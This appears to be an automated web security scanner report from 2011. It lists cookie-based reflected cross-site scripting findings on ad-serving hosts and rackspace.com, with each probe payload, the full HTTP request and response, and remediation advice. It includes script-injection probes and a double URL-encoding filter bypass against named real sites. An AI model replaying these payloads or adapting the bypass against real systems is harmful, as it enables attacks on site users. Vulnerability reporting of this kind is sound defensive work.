if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&2b912<script>alert(1)</script>27c4006c9b3', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1296920485";COMSCORE.BMX.Buddy.start(( ...[SNIP]...
The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 6f0a4<script>alert(1)</script>8fdb261c521 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&6f0a4<script>alert(1)</script>8fdb261c521; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 15:41:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 13931
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&6f0a4<script>alert(1)</script>8fdb261c521', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 526dd"><script>alert(1)</script>d8ca315aae6 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: D41U=3Nyj5fipbZBWiT7eNY-OMuK0KbpdEAgp0GrH-wWfsMRl3pcGRo-aEow; meld_sess=6acccca4-d0e4-464e-a824-f67cb28d5556526dd"><script>alert(1)</script>d8ca315aae6
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjk3LCAgc2l0ZTogICAgICAgICAid2V0cGFpbnR2MSIsICBhZDogICAgICAgICAgIDM1Njg2MTUsICBuZXR3b3JrOiAgICAgICJhZGR5bmFtaXgiLCAgc2l6ZTogICAgICAgICAiNzI4eDkwIiwgIGZyZXE6ICAgICAgICAgIjEtMSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiY2Q0OTllZmQtMTRkOS00N2UzLWI2MzEtM2JkOTEyYTZjYTQ4IiwgIHVzZXI6ICAgICAgICAgIjZhY2NjY2E0LWQwZTQtNDY0ZS1hODI0LWY2N2NiMjhkNTU1NjUyNmRkIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+ZDhjYTMxNWFhZTYiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInRlY2hub2xvZ3ktYXRmIiwgIGRpdjogICAgICAgICAgImNkNDk5ZWZkLTE0ZDktNDdlMy1iNjMxLTNiZDkxMmE2Y2E0OCIsICB1cmw6ICAgICAgICAgICJodHRwOi8vaHRjd2lraS53ZXRwYWludC5jb20vIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTEsICBhY2NvdW50X2lkOiAgIDMxNTc3LCAgbmV0d29ya19uYW1lOiAiQWREeW5hbWl4IChBRU0pIiwgIHB1Ymxpc2hlcl9uYW1lOiAid2V0cGFpbnQiLCAgZWNwbTogICAgICAgICAiMC43OSIsICBmZWNwbTogICAgICAgICIwLjc5IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJ0ZWNobm9sb2d5LWF0ZiIsICBydWxlOiAgICAgICAgICJ0ZWNobm9sb2d5LWF0ZiIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjQ4NTY2OCwgImJ1eSI6MTc4LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjQ4NTgwOCwgImJ1eSI6NTA0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHJpZ2dpdCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjQ4NTkwOSwgImJ1eSI6MTI0NCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJFcWFkcyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE3MTYwNTcsICJidXkiOjQyNTIsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiZCIsICBob3N0OiAgICAgICAgICJuai10YWcyNSJ9 Content-Length: 3132 Content-Type: text/html Date: Sat, 05 Feb 2011 15:59:47 GMT Connection: close
The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6daf3"><script>alert(1)</script>154ae141a7e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: D41U=3Nyj5fipbZBWiT7eNY-OMuK0KbpdEAgp0GrH-wWfsMRl3pcGRo-aEow; meld_sess=6acccca4-d0e4-464e-a824-f67cb28d55566daf3"><script>alert(1)</script>154ae141a7e
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjk3LCAgc2l0ZTogICAgICAgICAid2V0cGFpbnR2MSIsICBhZDogICAgICAgICAgIDM1Njg2MTUsICBuZXR3b3JrOiAgICAgICJhZGR5bmFtaXgiLCAgc2l6ZTogICAgICAgICAiNzI4eDkwIiwgIGZyZXE6ICAgICAgICAgIjEtMSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiYzE5MTNiZWMtNGU2YS00MTM2LTljMDUtYjQ4YTM5MWI0NWZjIiwgIHVzZXI6ICAgICAgICAgIjZhY2NjY2E0LWQwZTQtNDY0ZS1hODI0LWY2N2NiMjhkNTU1NjZkYWYzIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+MTU0YWUxNDFhN2UiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInRlY2hub2xvZ3ktYXRmIiwgIGRpdjogICAgICAgICAgImMxOTEzYmVjLTRlNmEtNDEzNi05YzA1LWI0OGEzOTFiNDVmYyIsICB1cmw6ICAgICAgICAgICJodHRwOi8vaHRjd2lraS53ZXRwYWludC5jb20vIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTEsICBhY2NvdW50X2lkOiAgIDMxNTc3LCAgbmV0d29ya19uYW1lOiAiQWREeW5hbWl4IChBRU0pIiwgIHB1Ymxpc2hlcl9uYW1lOiAid2V0cGFpbnQiLCAgZWNwbTogICAgICAgICAiMC43OSIsICBmZWNwbTogICAgICAgICIwLjc5IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJ0ZWNobm9sb2d5LWF0ZiIsICBydWxlOiAgICAgICAgICJ0ZWNobm9sb2d5LWF0ZiIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjQ4NTY2OCwgImJ1eSI6MTc4LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjQ4NTgwOCwgImJ1eSI6NTA0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHJpZ2dpdCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjQ4NTkwOSwgImJ1eSI6MTI0NCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJFcWFkcyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE3MTYwNTcsICJidXkiOjQyNTIsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiZCIsICBob3N0OiAgICAgICAgICJuai10YWcyMCJ9 Content-Length: 3132 Content-Type: text/html Date: Sat, 05 Feb 2011 15:59:47 GMT Connection: close
The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de34"><script>alert(1)</script>f99e5bb2eec was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: D41U=3Nyj5fipbZBWiT7eNY-OMuK0KbpdEAgp0GrH-wWfsMRl3pcGRo-aEow; meld_sess=6acccca4-d0e4-464e-a824-f67cb28d55568de34"><script>alert(1)</script>f99e5bb2eec
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjk3LCAgc2l0ZTogICAgICAgICAid2V0cGFpbnR2MSIsICBhZDogICAgICAgICAgIDM1Njg2MTUsICBuZXR3b3JrOiAgICAgICJhZGR5bmFtaXgiLCAgc2l6ZTogICAgICAgICAiNzI4eDkwIiwgIGZyZXE6ICAgICAgICAgIjEtMSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiZWQ3NjM1OTMtNjY0Yi00OWU0LWI4ODctMzAxNTMxNDU0MTA2IiwgIHVzZXI6ICAgICAgICAgIjZhY2NjY2E0LWQwZTQtNDY0ZS1hODI0LWY2N2NiMjhkNTU1NjhkZTM0Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+Zjk5ZTViYjJlZWMiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInRlY2hub2xvZ3ktYnRmIiwgIGRpdjogICAgICAgICAgImVkNzYzNTkzLTY2NGItNDllNC1iODg3LTMwMTUzMTQ1NDEwNiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vaHRjd2lraS53ZXRwYWludC5jb20vIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTEsICBhY2NvdW50X2lkOiAgIDMxNTc3LCAgbmV0d29ya19uYW1lOiAiQWREeW5hbWl4IChBRU0pIiwgIHB1Ymxpc2hlcl9uYW1lOiAid2V0cGFpbnQiLCAgZWNwbTogICAgICAgICAiMC43OSIsICBmZWNwbTogICAgICAgICIwLjc5IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJ0ZWNobm9sb2d5LWJ0ZiIsICBydWxlOiAgICAgICAgICJ0ZWNobm9sb2d5LWJ0ZiIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjQ4NTY2OCwgImJ1eSI6MTc4LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjQ4NTgwOCwgImJ1eSI6NTA0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlRyaWdnaXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo0ODU5MDksICJidXkiOjEyNDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRXFhZHMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxNzE2MDU3LCAiYnV5Ijo0MjUyLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9XSwgIHRhcmdldGluZzogICAgImQiLCAgaG9zdDogICAgICAgICAibmotdGFnMjAifQ== Content-Length: 3132 Content-Type: text/html Date: Sat, 05 Feb 2011 15:59:42 GMT Connection: close
The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80106"><script>alert(1)</script>a7f3b17766c was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: D41U=3Nyj5fipbZBWiT7eNY-OMuK0KbpdEAgp0GrH-wWfsMRl3pcGRo-aEow; meld_sess=6acccca4-d0e4-464e-a824-f67cb28d555680106"><script>alert(1)</script>a7f3b17766c
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjk3LCAgc2l0ZTogICAgICAgICAid2V0cGFpbnR2MSIsICBhZDogICAgICAgICAgIDQwMTUwOSwgIG5ldHdvcms6ICAgICAgImFkYnJpdGUiLCAgc2l6ZTogICAgICAgICAiNzI4eDkwIiwgIGZyZXE6ICAgICAgICAgIjEtNSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiNTFhMTA5ZTktZjBiMi00YjRkLTlkYmMtODY2NTcxOWEyMmRiIiwgIHVzZXI6ICAgICAgICAgIjZhY2NjY2E0LWQwZTQtNDY0ZS1hODI0LWY2N2NiMjhkNTU1NjgwMTA2Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+YTdmM2IxNzc2NmMiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInRlY2hub2xvZ3ktYnRmIiwgIGRpdjogICAgICAgICAgIjUxYTEwOWU5LWYwYjItNGI0ZC05ZGJjLTg2NjU3MTlhMjJkYiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vaHRjd2lraS53ZXRwYWludC5jb20vIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTksICBhY2NvdW50X2lkOiAgIDIxOTQyLCAgbmV0d29ya19uYW1lOiAiQWRCcml0ZSAoVjEpIiwgIHB1Ymxpc2hlcl9uYW1lOiAid2V0cGFpbnQiLCAgZWNwbTogICAgICAgICAiMC41MiIsICBmZWNwbTogICAgICAgICIwLjUyIiwgIGZpbGw6ICAgICAgICAgIjMwLjM4IiwgIHBsYWNlbWVudDogICAgInRlY2hub2xvZ3ktYnRmIiwgIHJ1bGU6ICAgICAgICAgInRlY2hub2xvZ3ktYnRmIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NDg1NjY4LCAiYnV5IjoxNzgsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NDg1ODA4LCAiYnV5Ijo1MDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NDg1OTA5LCAiYnV5IjoxMjQ0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkVxYWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTcxNjA1NywgImJ1eSI6NDI1MiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnNDAifQ== Content-Length: 2851 Content-Type: text/html Date: Sat, 05 Feb 2011 15:59:41 GMT Connection: close
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ad84%2527%253b00ba9547042 was submitted in the IS_UASrackuid cookie. This input was echoed as 6ad84';00ba9547042 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 645df%2527%253b14f4e5886cf was submitted in the IS_UASrackuid cookie. This input was echoed as 645df';14f4e5886cf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8645df%2527%253b14f4e5886cf; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; 